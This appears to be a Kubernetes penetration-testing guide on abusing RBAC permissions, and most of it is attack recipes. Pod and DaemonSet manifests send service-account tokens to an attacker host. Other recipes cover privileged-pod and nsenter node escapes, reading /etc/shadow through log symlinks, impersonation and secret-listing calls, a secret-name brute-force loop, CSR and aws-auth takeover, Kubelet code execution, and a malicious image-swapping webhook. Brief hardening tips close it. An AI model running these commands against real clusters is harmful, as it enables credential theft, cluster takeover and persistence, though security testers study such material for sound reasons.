Abusing Roles/ClusterRoles in Kubernetes
Here you can find some potentially dangerous Roles and ClusterRoles configurations.
Remember that you can get all the supported resources with kubectl api-resources
Privilege escalation here refers to the art of getting access to a different principal with different privileges (within the Kubernetes cluster or in external clouds) than the ones you already have. In Kubernetes there are basically 4 main techniques to escalate privileges:
Be able to impersonate other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds
Be able to create/patch/exec pods where you can find or attach SAs with better privileges within the kubernetes cluster or to external clouds
Be able to read secrets as the SAs tokens are stored as secrets
Be able to escape to the node from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)
A fifth technique that deserves a mention is the ability to run port-forward in a pod, as you may be able to access interesting resources within that pod.
The wildcard (*) gives permission over any resource with any verb. It's used by admins. Inside a ClusterRole this means that an attacker could abuse any namespace in the cluster.
In RBAC, certain permissions pose significant risks:
create: Grants the ability to create any cluster resource, risking privilege escalation.
list: Allows listing all resources, potentially leaking sensitive data.
get: Permits accessing secrets from service accounts, posing a security threat.
An attacker with the permissions to create a pod could attach a privileged Service Account to the pod and steal its token to impersonate the Service Account, effectively escalating privileges to it.
Example of a pod that will steal the token of the bootstrap-signer service account and send it to the attacker:
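A minimal sketch of such a pod (the pod name and the attacker URL are placeholders; it assumes the bootstrap-signer SA lives in kube-system):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: token-stealer           # hypothetical name
  namespace: kube-system        # namespace where the bootstrap-signer SA exists
spec:
  serviceAccountName: bootstrap-signer
  containers:
  - name: exfil
    image: curlimages/curl
    command: ["sh", "-c"]
    # Send the mounted SA token to an attacker-controlled host (placeholder URL)
    args: ["curl -s -d @/var/run/secrets/kubernetes.io/serviceaccount/token https://attacker.example.com/token; sleep 3600"]
```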
The following indicates all the privileges a container can have:
Privileged access (disabling protections and setting capabilities)
Disable namespace isolation by using the host's IPC and PID namespaces (hostIPC, hostPID), which can help to escalate privileges
Use the host's network namespace (hostNetwork), giving access to steal the node's cloud privileges and better access to networks
Mount the host's / inside the container
Create the pod with:
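A minimal sketch of such an everything-allowed pod (names are placeholders) and the command to create it with a stolen token:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed      # hypothetical name
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: shell
    image: ubuntu
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: hostroot
      mountPath: /host          # the host's / ends up here
  volumes:
  - name: hostroot
    hostPath:
      path: /
```

```bash
kubectl --token $token create -f everything-allowed.yaml
```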
One-liner from this tweet and with some additions:
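A sketch of that one-liner (the image name passed to --image is irrelevant because the overrides replace the container spec; nsenter into the host's mount namespace gives a root shell on the node):

```bash
kubectl run r00t --restart=Never -ti --rm --image lol --overrides \
  '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'
```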
Now that you can escape to the node check post-exploitation techniques in:
You probably want to be stealthier. In the following pages you can see what you would be able to access if you create a pod only enabling some of the privileges mentioned in the previous template:
Privileged + hostPID
Privileged only
hostPath
hostPID
hostNetwork
hostIPC
You can find examples of how to create/abuse the previous privileged pod configurations in https://github.com/BishopFox/badPods
If you can create a pod (and optionally a service account) you might be able to obtain privileges in the cloud environment by assigning cloud roles to a pod or a service account and then accessing it. Moreover, if you can create a pod with the host network namespace you can steal the IAM role of the node instance.
For more information check:
Pod Escape Privileges
It's possible to abuse these permissions to create a new pod and escalate privileges like in the previous example.
The following yaml creates a daemonset and exfiltrates the token of the SA inside the pod:
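A minimal sketch of such a DaemonSet (the target SA name and the attacker URL are placeholders):

```yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: token-exfil             # hypothetical name
  namespace: kube-system
spec:
  selector:
    matchLabels:
      app: token-exfil
  template:
    metadata:
      labels:
        app: token-exfil
    spec:
      serviceAccountName: <privileged-sa>   # SA whose token you want to steal
      containers:
      - name: exfil
        image: curlimages/curl
        command: ["sh", "-c"]
        # Post the mounted SA token to an attacker-controlled host (placeholder URL)
        args: ["curl -s -d @/var/run/secrets/kubernetes.io/serviceaccount/token https://attacker.example.com/token; sleep 3600"]
```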
pods/exec is a resource in Kubernetes used for running commands in a shell inside a pod. This allows running commands inside the containers or getting a shell inside them.
Therefore, it's possible to get inside a pod and steal the token of its SA, or enter a privileged pod, escape to the node, and steal all the tokens of the pods running on the node and (ab)use the node:
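For example (pod and namespace names are placeholders):

```bash
kubectl exec -it <pod-name> -n <namespace> -- sh
# Once inside, grab the SA token mounted in the pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
```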
This permission allows forwarding one local port to a port in the specified pod. It's meant to make debugging applications running inside a pod easy, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable (webs?) applications inside a pod:
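For example, to reach a database listening inside a pod (names and ports are placeholders):

```bash
kubectl port-forward pod/<pod-name> -n <namespace> 5432:5432
# The pod's port 5432 is now reachable on localhost:5432
```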
As indicated in this research, if you can access or create a pod with the host's /var/log/ directory mounted in it, you can escape from the container.
This is basically because when the Kube-API tries to get the logs of a container (using kubectl logs <pod>), it requests the 0.log file of the pod using the /logs/ endpoint of the Kubelet service. The Kubelet service exposes the /logs/ endpoint, which is basically exposing the /var/log filesystem of the container.
Therefore, an attacker with access to write in the /var/log/ folder of the container could abuse this behaviour in 2 ways:
Modifying the 0.log file of its container (usually located in /var/log/pods/namespace_pod_uid/container/0.log) to be a symlink pointing to /etc/shadow for example. Then, you will be able to exfiltrate the host's shadow file doing:
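A sketch of the attack, assuming the host's /var/log is mounted inside the compromised container and the path components below are just examples:

```bash
# Inside the compromised container: replace the pod's log file with a symlink
ln -sf /etc/shadow /var/log/pods/<namespace>_<pod>_<uid>/<container>/0.log

# From the attacker's side: the Kubelet follows the symlink when serving the logs
kubectl logs <pod> -n <namespace>    # returns the host's /etc/shadow
```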
If the attacker controls any principal with the permissions to read nodes/log, he can just create a symlink in /host-mounted/var/log/sym pointing to / and, when accessing https://<gateway>:10250/logs/sym/, he will list the host's root filesystem (changing the symlink can provide access to specific files).
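A sketch, assuming the host's /var/log is mounted at /host-mounted/var/log inside the compromised pod:

```bash
# Inside the pod: point a file under the host's /var/log to the host's root
ln -s / /host-mounted/var/log/sym

# With a principal allowed to read nodes/log, browse the node's root filesystem
curl -k -H "Authorization: Bearer $TOKEN" "https://<gateway>:10250/logs/sym/"
```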
A laboratory and automated exploit can be found in https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts
If you are lucky enough and the highly privileged capability CAP_SYS_ADMIN is available, you can just remount the folder as rw:
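For example, assuming the host's log directory is mounted read-only at /var/log inside the container:

```bash
mount -o remount,rw /var/log    # requires CAP_SYS_ADMIN
```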
As stated in this research it’s possible to bypass the protection:
Which was meant to prevent escapes like the previous ones, by using, instead of a hostPath mount, a PersistentVolume and a PersistentVolumeClaim to mount a host's folder in the container with writable access:
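A minimal sketch of such a PersistentVolume/PersistentVolumeClaim pair exposing the host's /var/log (names and storage class are placeholders):

```yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: host-log-pv             # hypothetical name
spec:
  capacity:
    storage: 1Gi
  accessModes: ["ReadWriteOnce"]
  storageClassName: manual
  hostPath:
    path: /var/log              # host folder exposed through the PV
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: host-log-pvc            # reference this from the pod's volumes section
spec:
  accessModes: ["ReadWriteOnce"]
  storageClassName: manual
  resources:
    requests:
      storage: 1Gi
```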
With a user impersonation privilege, an attacker could impersonate a privileged account.
Just use the parameter --as=<username> in the kubectl command to impersonate a user, or --as-group=<group> to impersonate a group:
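For example, checking what you can reach as the all-powerful system:masters group (a quick sketch):

```bash
kubectl get secrets -n kube-system --as=null --as-group=system:masters
kubectl auth can-i --list --as=system:serviceaccount:kube-system/default
```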
Or use the REST API:
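A sketch using the impersonation headers against the API server (addresses and names are placeholders):

```bash
curl -k -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: system:serviceaccount:kube-system/default" \
  -H "Impersonate-Group: system:masters" \
  "https://<apiserver>:6443/api/v1/namespaces/kube-system/secrets/"
```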
The permission to list secrets could allow an attacker to actually read the secrets by accessing the REST API endpoint:
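For example (the API server address is a placeholder):

```bash
# List every secret the token is allowed to list, cluster-wide
curl -k -H "Authorization: Bearer $TOKEN" "https://<apiserver>:6443/api/v1/secrets/"
# Or only in a specific namespace
curl -k -H "Authorization: Bearer $TOKEN" "https://<apiserver>:6443/api/v1/namespaces/kube-system/secrets/"
```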
While an attacker in possession of a token with read permission requires the exact name of a secret to use it (unlike the broader list secrets privilege), it can still be abused. Default service accounts in the system can be enumerated, each associated with a secret. These secrets have a name structure: a static prefix followed by a random five-character alphanumeric token (excluding certain characters) according to the source code.
The token is generated from a limited 27-character set (bcdfghjklmnpqrstvwxz2456789), rather than the full alphanumeric range. This limitation reduces the total possible combinations to 14,348,907 (27^5). Consequently, an attacker could feasibly execute a brute-force attack to deduce the token in a matter of hours, potentially leading to privilege escalation by accessing sensitive service accounts.
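A rough brute-force sketch (it assumes the legacy default-token-<suffix> naming and probes each candidate name with the get verb; server address and namespace are placeholders):

```bash
TOKEN="<token-with-get-on-secrets>"; API="https://<apiserver>:6443"
CHARSET="b c d f g h j k l m n p q r s t v w x z 2 4 5 6 7 8 9"
for a in $CHARSET; do for b in $CHARSET; do for c in $CHARSET; do for d in $CHARSET; do for e in $CHARSET; do
  name="default-token-$a$b$c$d$e"
  code=$(curl -sk -o /dev/null -w "%{http_code}" -H "Authorization: Bearer $TOKEN" \
    "$API/api/v1/namespaces/default/secrets/$name")
  [ "$code" = "200" ] && echo "Found: $name"
done; done; done; done; done
```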
If you have the verb create over the resource certificatesigningrequests (or at least over certificatesigningrequests/nodeClient), you can create a CSR for a new node.
According to the documentation it's possible to auto-approve these requests, so in that case you don't need extra permissions. If not, you would need to be able to approve the request, which means update in certificatesigningrequests/approval and approve in signers with resourceName <signerNameDomain>/<signerNamePath> or <signerNameDomain>/*
An example of a role with all the required permissions is:
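A sketch of such a ClusterRole (the role name is a placeholder and the kubelet client signer is used as the example resourceName):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: csr-node-privesc        # hypothetical name
rules:
- apiGroups: ["certificates.k8s.io"]
  resources: ["certificatesigningrequests"]
  verbs: ["create", "get", "list", "watch"]
- apiGroups: ["certificates.k8s.io"]
  resources: ["certificatesigningrequests/approval"]
  verbs: ["update"]
- apiGroups: ["certificates.k8s.io"]
  resources: ["signers"]
  resourceNames: ["kubernetes.io/kube-apiserver-client-kubelet"]
  verbs: ["approve"]
```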
So, with the new node CSR approved, you can abuse the special permissions of nodes to steal secrets and escalate privileges.
In this post and this one the GKE K8s TLS Bootstrap configuration is configured with automatic signing and it's abused to generate credentials of a new K8s Node and then abuse those to escalate privileges by stealing secrets. If you have the mentioned privileges you could do the same thing. Note that the first example bypasses the error preventing a new node from accessing secrets inside containers, because a node can only access the secrets of containers mounted on it.
The way to bypass this is just to create node credentials for the node name where the container with the interesting secrets is mounted (but just check how to do it in the first post):
Principals that can modify configmaps in the kube-system namespace of EKS clusters (needs to be in AWS) can obtain cluster admin privileges by overwriting the aws-auth configmap.
The verbs needed are update and patch, or create if the configmap wasn't created:
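A sketch of a malicious aws-auth overwrite granting an attacker-controlled IAM role system:masters (the role ARN is a placeholder):

```yaml
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    - rolearn: arn:aws:iam::<attacker-account-id>:role/<attacker-role>
      username: attacker
      groups:
        - system:masters
```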
You can use aws-auth for persistence, giving access to users from other accounts.
However, aws --profile other_account eks update-kubeconfig --name <cluster-name> doesn't work from a different account. But actually aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing works if you put the ARN of the cluster instead of just the name.
To make kubectl work, just make sure to configure the victim's kubeconfig and in the aws exec args add --profile other_account_role so kubectl will be using the other account's profile to get the token and contact AWS.
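A sketch of the relevant kubeconfig user entry (the user name is a placeholder; the cluster ARN matches the example above):

```yaml
users:
- name: eks-victim
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: aws
      args:
      - eks
      - get-token
      - --cluster-name
      - arn:aws:eks:us-east-1:123456789098:cluster/Testing
      - --profile
      - other_account_role
```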
There are 2 ways to assign K8s permissions to GCP principals. In any case the principal also needs the permission container.clusters.get
to be able to gather credentials to access the cluster, or you will need to generate your own kubectl config file (follow the next link).
When talking to the K8s API endpoint, the GCP auth token will be sent. Then, GCP, through the K8s API endpoint, will first check if the principal (by email) has any access inside the cluster, then it will check if it has any access via GCP IAM. If either of those is true, the request will be answered. If not, an error suggesting to grant permissions via GCP IAM will be returned.
The first method is using GCP IAM: the K8s permissions have their equivalent GCP IAM permissions, and if the principal has them, it will be able to use them.
GCP - Container Privesc
The second method is assigning K8s permissions inside the cluster, identifying the user by its email (GCP service accounts included).
Principals that can create TokenRequests (serviceaccounts/token) can request tokens for other service accounts and use them when talking to the K8s API endpoint, effectively impersonating those SAs (info from here).
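For example, with a recent kubectl (names are placeholders):

```bash
# Request a token for another (more privileged) service account
kubectl create token <target-sa> -n <namespace>
```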
Principals that can update or patch pods/ephemeralcontainers can gain code execution on other pods, and potentially break out to their node, by adding an ephemeral container with a privileged securityContext.
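A sketch (pod, namespace and container names are placeholders; kubectl debug uses this subresource under the hood, and a raw patch like the one below is one way to try to add a privileged ephemeral container):

```bash
# Simple code execution in another pod via an ephemeral container
kubectl debug -it <pod> -n <namespace> --image=busybox --target=<container> -- sh

# Raw patch adding a privileged ephemeral container (sketch; may be rejected by policy engines)
curl -k -X PATCH -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/strategic-merge-patch+json" \
  "https://<apiserver>:6443/api/v1/namespaces/<namespace>/pods/<pod>/ephemeralcontainers" \
  -d '{"spec":{"ephemeralContainers":[{"name":"pwn","image":"alpine","command":["sleep","3600"],"securityContext":{"privileged":true},"targetContainerName":"<container>"}]}}'
```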
Principals with any of the verbs create, update or patch over validatingwebhookconfigurations or mutatingwebhookconfigurations might be able to create such a webhook configuration in order to escalate privileges.
For a mutatingwebhookconfigurations example check this section of this post.
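A minimal sketch of a malicious MutatingWebhookConfiguration pointing at an attacker-controlled endpoint (name, URL and CA bundle are placeholders):

```yaml
apiVersion: admissionregistration.k8s.io/v1
kind: MutatingWebhookConfiguration
metadata:
  name: evil-webhook            # hypothetical name
webhooks:
- name: evil.attacker.example.com
  admissionReviewVersions: ["v1"]
  sideEffects: None
  failurePolicy: Ignore
  clientConfig:
    url: https://attacker.example.com/mutate
    # caBundle: <base64 CA that signed the attacker server's certificate>
  rules:
  - operations: ["CREATE"]
    apiGroups: [""]
    apiVersions: ["v1"]
    resources: ["pods"]
```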
As you can read in the next section (Built-in Privileged Escalation Prevention), a principal cannot update nor create roles or clusterroles without having those new permissions himself. Except if he has the verb escalate over roles or clusterroles: then he can update/create new roles and clusterroles with better permissions than the ones he has.
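A rule granting that exception looks roughly like this sketch:

```yaml
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["roles", "clusterroles"]
  verbs: ["escalate", "create", "update", "patch"]
```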
Principals with access to the nodes/proxy subresource can execute code on pods via the Kubelet API (according to this). More information about Kubelet authentication on this page:
You have an example of how to get RCE talking to the Kubelet API with authorization here.
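A sketch of reaching the Kubelet API through the API server's node proxy (node/pod/container names are placeholders; the /run endpoint path format is an assumption):

```bash
# Enumerate the pods running on a node via the Kubelet, proxied through the API server
kubectl get --raw "/api/v1/nodes/<node>/proxy/pods"

# Execute a command in a container through the Kubelet's /run endpoint
curl -k -X POST -H "Authorization: Bearer $TOKEN" \
  "https://<apiserver>:6443/api/v1/nodes/<node>/proxy/run/<namespace>/<pod>/<container>" \
  -d "cmd=id"
```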
Principals that can delete pods (delete verb over the pods resource), or evict pods (create verb over the pods/eviction resource), or change the pod status (access to pods/status), and can make other nodes unschedulable (access to nodes/status) or delete nodes (delete verb over the nodes resource), and have control over a pod, could steal pods from other nodes so they are executed in the compromised node and the attacker can steal the tokens from those pods.
Principals that can modify services/status may set the status.loadBalancer.ingress.ip field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to this).
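A sketch (it assumes a kubectl version supporting --subresource; service name, namespace and IP are placeholders):

```bash
kubectl patch svc <service> -n <namespace> --subresource=status --type=merge \
  -p '{"status":{"loadBalancer":{"ingress":[{"ip":"<attacker-controlled-ip>"}]}}}'
```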
Principals with update or patch permissions over nodes/status or pods/status could modify labels to affect the scheduling constraints being enforced.
Kubernetes has a built-in mechanism to prevent privilege escalation.
This system ensures that users cannot elevate their privileges by modifying roles or role bindings. The enforcement of this rule occurs at the API level, providing a safeguard even when the RBAC authorizer is inactive.
The rule stipulates that a user can only create or update a role if they possess all the permissions the role comprises. Moreover, the scope of the user's existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles.
There is an exception to the previous rule. If a principal has the verb escalate over roles or clusterroles he can increase the privileges of roles and clusterroles even without having the permissions himself.
Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section: you cannot create/modify a rolebinding to give yourself or a different SA privileges that you don't already have.
The privilege to create Rolebindings allows a user to bind roles to a service account. This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account.
By default there isn't any encryption in the communication between pods. Mutual authentication (two-way, pod to pod) is recommended.
Create your .yaml
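For example, a simple app manifest generated with a client-side dry-run (the app name, image and command are just an example):

```bash
kubectl run app --image=bash --command -o yaml --dry-run=client > app.yaml -- sh -c 'ping google.com'
```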
Edit your .yaml and uncomment the indicated lines:
See the logs of the proxy:
More info at: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/
An admission controller intercepts requests to the Kubernetes API server before the persistence of the object, but after the request is authenticated and authorized.
If an attacker somehow manages to inject a Mutating Admission Controller, he will be able to modify already authenticated requests, potentially being able to privesc and, more usually, to persist in the cluster.
Example from https://blog.rewanthtammana.com/creating-malicious-admission-controllers:
Check the status to see if it's ready:
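For example (the namespace/labels used by the deployment script are assumptions):

```bash
kubectl get mutatingwebhookconfigurations
kubectl get pods -A | grep webhook
```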
Then deploy a new pod:
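For example:

```bash
kubectl run nginx --image=nginx
kubectl get po -w    # watch the pod end up in ErrImagePull
```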
When you see the ErrImagePull error, check the image name with either of these queries:
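For example (the pod name nginx matches the previous step):

```bash
kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}'
kubectl describe po nginx | grep "Image: "
```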
As you can see, we tried running the image nginx but the final executed image is rewanthtammana/malicious-image. What just happened!!?
The ./deploy.sh
script establishes a mutating webhook admission controller, which modifies requests to the Kubernetes API as specified in its configuration lines, influencing the outcomes observed:
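The relevant patching logic looks roughly like the following JSON Patch returned by the webhook (a sketch reconstructing the idea; the exact script contents may differ):

```bash
# Sketch of the JSONPatch the mutating webhook applies to incoming pod specs
PATCH='[{"op":"replace","path":"/spec/containers/0/image","value":"rewanthtammana/malicious-image"}]'
```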
The above snippet replaces the first container image in every pod with rewanthtammana/malicious-image
.
Pods and Service Accounts: By default, pods mount a service account token. To enhance security, Kubernetes allows the disabling of this automount feature.
How to Apply: Set automountServiceAccountToken: false in the configuration of service accounts or pods, starting from Kubernetes version 1.6.
Selective Inclusion: Ensure that only necessary users are included in RoleBindings or ClusterRoleBindings. Regularly audit and remove irrelevant users to maintain tight security.
Roles vs. ClusterRoles: Prefer using Roles and RoleBindings for namespace-specific permissions rather than ClusterRoles and ClusterRoleBindings, which apply cluster-wide. This approach offers finer control and limits the scope of permissions.